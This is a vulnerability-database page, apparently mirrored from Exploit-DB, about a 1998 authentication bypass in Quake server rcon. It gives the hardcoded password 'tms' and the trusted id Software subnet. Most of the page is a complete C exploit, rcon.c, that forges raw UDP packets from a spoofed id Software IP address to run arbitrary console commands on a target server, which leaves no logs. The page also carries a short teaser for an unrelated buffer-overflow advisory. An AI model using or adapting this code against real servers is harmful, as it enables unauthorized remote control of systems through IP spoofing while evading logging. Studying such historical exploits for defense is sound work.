id Software Solaris Quake II 3.13/3.14 / QuakeWorld 2.0/2.1 / Quake 1.9/3.13/3.14 – Command Execution

id Software Solaris Quake II 3.13/3.14 / QuakeWorld 2.0/2.1 / Quake 1.9/3.13/3.14 – Command Execution

漏洞ID 1053369 漏洞类型
发布时间 1998-05-01 更新时间 1998-05-01
图片[1]-id Software Solaris Quake II 3.13/3.14 / QuakeWorld 2.0/2.1 / Quake 1.9/3.13/3.14 – Command Execution-安全小百科CVE编号 N/A
图片[2]-id Software Solaris Quake II 3.13/3.14 / QuakeWorld 2.0/2.1 / Quake 1.9/3.13/3.14 – Command Execution-安全小百科CNNVD-ID N/A
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/19079
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/90/info

The Quake server has a feature where it allows administrators to remotely send commands to the Quake console with a password. However, it is possible to remotely bypass authentication.

In order for this to be exploited, the attacker would have to create a handcrafted udp packet with a header containing the rcon command and the password "tms" with a source IP coming from ID Software's Subnet. (192.246.40)

The Quake server does not require an open connection for sending the rcon packet. When this is exploited, no logs are reported of the rcon command being used.

This vulnerability is present in Quake 1, QuakeWorld, Quake 2, Quake 2 Linux and Quake 2 Solaris, all versions.

/* rcon.c
Quake world rcon_password bug implimentation by Jeff Roberson, <[email protected]> (VallaH)
Linux 2.0.33 source, will compile on BSD if you modify the ip header etc.
Please note that I did not discover this, I simply wrote the code.
Thanks to Nick Toomey, <[email protected]> (Grifter)

Brief summary:
Any rcon command coming from the idsoftware subnet 192.246.40 with the rcon password of tms will be accepted on any server. This program simply spoofs a packet from vader.idsoftware.com (random pick) to whatever server you identify.
If you are connected to a network with a small MTU (e.g. PPP) change the buffer 'buf' from 512 bytes to something somewhat smaller than your MTU.

Usage:
./rcon ip/host "what you want to do" [port]
Example:
./rcon quake.idsoftware.com "say This program works, thanks Jeff" 27500
the port argument is optional, you may omit it if you like and it will default to 27500.
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h> 

#define SIP "192.246.40.42" /* vader.idsoftware.com */
#define command "ÿÿÿÿrcon tms "

u_long resolve_address(u_char *host)
{
struct in_addr addr;
struct hostent *he;

if((addr.s_addr = inet_addr(host)) == -1) {
if (!(he = gethostbyname(host))) {
printf("Unknown address: %sn", host); 
exit(-1);
}
bcopy(he->h_addr, (char *)&addr.s_addr, he->h_length);
}
return(addr.s_addr);
}
int main(int argc, char **argv)
{
int s;
int port=27500;
char buf[512];
struct sockaddr_in dst;
struct iphdr *iph=(struct iphdr *)buf;
struct udphdr *udp=(struct udphdr *)(buf + 20);

if (argc<3) {
printf("usage:n");
printf("t%s ip ""command"" <port>n", argv[0]);
exit(-1);
}
if (argc==4) port = atoi(argv[3]);
bzero(buf, sizeof(buf));
bzero((char *)&dst, sizeof(dst));

iph->version=4;
iph->ihl=5;
iph->tos=0;
iph->tot_len=htons(sizeof(buf));
iph->id=htons(1234);
iph->frag_off=0;
iph->ttl=255;
iph->protocol=17;

iph->saddr=inet_addr(SIP);
iph->daddr=resolve_address(argv[1]);

udp->source=htons(1234);
udp->dest=htons(port);
udp->len=htons(sizeof(buf) - 20);

dst.sin_family=PF_INET;
dst.sin_addr.s_addr=iph->daddr;
dst.sin_port=htons(27500);

sprintf((buf + 28), "%s%sn", command, argv[2]); 

if ((s=socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
perror("socket");
exit(-1);
}

if ((sendto(s, buf, sizeof(buf), 0, (struct sockaddr *)&dst, sizeof(dst))) <=0) {
perror("sendto");
exit(-1);
}
exit(1);
}

相关推荐: cidentd识别守护程序缓冲区溢出漏洞

cidentd识别守护程序缓冲区溢出漏洞 漏洞ID 1207418 漏洞类型 缓冲区溢出 发布时间 1998-01-10 更新时间 1998-01-10 CVE编号 CVE-1999-1176 CNNVD-ID CNNVD-199801-013 漏洞平台 N/…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享